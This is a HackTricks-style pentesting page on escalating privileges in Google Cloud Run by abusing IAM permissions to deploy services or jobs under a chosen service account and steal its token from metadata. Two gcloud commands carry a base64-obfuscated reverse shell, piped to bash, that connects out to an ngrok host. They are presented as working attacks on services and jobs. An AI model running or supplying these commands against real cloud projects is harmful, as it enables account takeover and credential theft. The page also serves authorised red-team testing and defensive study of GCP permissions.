gcp-run-privesc.md

GCP - Run Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Cloud Run

For more information about Cloud Run check:

{% content-ref url="../../gcp-pentesting/gcp-services/gcp-cloud-run-enum.md" %} gcp-cloud-run-enum.md {% endcontent-ref %}

run.services.create , iam.serviceAccounts.actAs, run.routes.invoke

An attacker with these permissions to create a run service running arbitrary code (arbitrary Docker container), attach a Service Account to it, and make the code exfiltrate the Service Account token from the metadata.

An exploit script for this method can be found here and the Docker image can be found here.

Note that when using gcloud run deploy instead of just creating the service it needs the update permission. Check an example here.

run.services.update , iam.serviceAccounts.actAs

Like the previous one but updating a service:

gcloud run deploy hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

run.services.setIamPolicy

Give yourself previous permissions over cloud Run.

run.jobs.create, run.jobs.run, (run.jobs.get)

Launch a job with a reverse shell to steal the service account indicated in the command. You can find an exploit here.

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

Similar to the previous one it's possible to update a job and update the SA, the command and execute it:

gcloud beta run jobs update hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--project=security-devbox --execute-now

run.jobs.setIamPolicy

Give yourself the previous permissions over Cloud Jobs.

References

• https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.